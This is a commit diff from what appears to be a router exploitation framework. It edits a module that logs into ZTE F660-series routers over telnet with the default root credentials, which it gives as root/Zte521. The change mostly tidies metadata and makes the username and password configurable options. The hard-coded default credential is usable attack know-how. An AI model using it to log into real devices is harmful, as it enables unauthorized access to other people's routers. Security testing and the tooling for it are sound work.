Commit 5d98e2bf by devilscream

Fix exploits ZTE F6XX default root password

parent e3ff667c
......@@ -14,13 +14,12 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE F6XX Default root',
'description': 'Module exploits ZTE F6XX default root password. If the target is is possible to authentiate to the device.',
'description': 'Module exploits ZTE F6XX default root password. If the target is possible to authentiate to the device.',
'authors': [
'devilscream', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'devilscream' # vulnerability discovery
],
'references': [
'',
'http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html'
],
'devices': [
'ZTE ZXA10 F660',
......@@ -30,9 +29,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = "root"
password = "Zte521"
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
def run(self):
try:
......@@ -58,6 +56,7 @@ class Exploit(exploits.Exploit):
print_error("Connection Error")
return
@mute
def check(self):
try:
tn = telnetlib.Telnet(self.target, 23)
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment